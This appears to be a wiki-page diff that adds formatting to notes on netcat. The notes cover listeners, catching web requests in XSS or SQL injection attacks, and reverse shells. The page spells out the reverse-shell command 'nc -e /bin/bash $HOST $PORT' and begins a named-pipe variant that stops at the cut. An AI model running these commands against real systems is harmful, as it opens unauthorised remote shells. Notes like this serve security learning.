netcat

 nc -l -p $PORT $HOST

-The $HOST specification here is optional; if left off, netcat binds to 0.0.0.0.
+The `$HOST` specification here is optional; if left off, netcat binds to 0.0.0.0.

 Note that netcat will exit once the first connection closes.

-(According to the netcat docs, it looks like nc -l $HOST $PORT should also work, but it doesn't.
-I think - though I haven't been able to verify - that what's happening here is that -p specifies the port to listen to, while the port following the $HOST specification is the port to connect to.)
+(According to the netcat docs, it looks like `nc -l $HOST $PORT` should also work, but it doesn't.
+I think - though I haven't been able to verify - that what's happening here is that `-p` specifies the port to *listen* to, while the port following the `$HOST` specification is the port to *connect* to.)

 A netcat server doesn't have to be used just for reverse shells.
-For example, you can also use it to catch web requests in conjunction with XSS or SQLi attacks.
+For example, you can also use it to catch web requests in conjunction with [[XSS attacks|XSS]] or [[SQL injection attacks|SQLi]] attacks.

 nc $HOST $PORT

-Some versions of netcat support an -e flag that hooks STDIN and STDOUT of an executable to the established network connection.
+*Some* versions of netcat support an `-e` flag that hooks STDIN and STDOUT of an executable to the established network connection.
 So something like the following will establish a reverse shell:

 nc -e /bin/bash $HOST $PORT

-The -e flag (and similar -c flag) is considered a security risk (for obvious reasons!) and is disabled on many systems.
+> The `-e` flag (and similar `-c` flag) is considered a security risk (for obvious reasons!) and is disabled on many systems.

-The -c and -e flags, which allow netcat to hook other applications, are considered security risks (for obvious reasons!) and are disabled on many systems.
+> The `-c` and `-e` flags, which allow netcat to hook other applications, are considered security risks (for obvious reasons!) and are disabled on many systems.

 Example reverse shell:

-The -e flag (and similar -c flag) is considered a security risk (for obvious reasons!) and is disabled on many systems.
+> The `-e` flag (and similar `-c` flag) is considered a security risk (for obvious reasons!) and is disabled on many systems.

-If the -c or -e flags aren't available (which is normal these days), then named pipes can be used instead:
+If the `-c` or `-e` flags aren't available (which is normal these days), then named pipes can be used instead:

 mkfifo /tmp/p; \